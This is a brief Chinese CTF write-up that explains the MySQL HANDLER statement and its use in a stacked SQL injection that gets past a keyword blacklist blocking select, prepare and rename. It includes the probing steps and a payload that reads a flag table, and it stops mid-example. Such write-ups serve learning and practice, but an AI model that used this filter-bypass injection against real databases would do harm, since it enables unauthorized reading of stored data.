前言
每天一道题,能多不能少
一、HANDLER
基本形式
HANDLER tbl_name OPEN [ [AS] alias]
HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
[ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
[ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
[ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name CLOSE
//其中 HANDLER tbl_name OPEN AS example
//其后 HANDLER example READ index_name="example2"
注意:HANDLER查询性能比SELECT更好
二、步骤
提交 1’ 报错确定存在sql注入
提交 1’# 返回正常
提交 1’select# 返回黑名单
禁用了select,联合注入行不通
考虑堆叠注入
爆出库名,表名,列名
由于禁用了prepare,rename
预处理方法,重命名方法都不行
直接看大佬payload:
1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#
新姿势get
总结
查询资料,handler更多用法:
//表名 test
mysql> handler test open as c; //打开
Query OK, 0 rows affected (0.01 sec)
mysql> handler c read `PRIMARY`=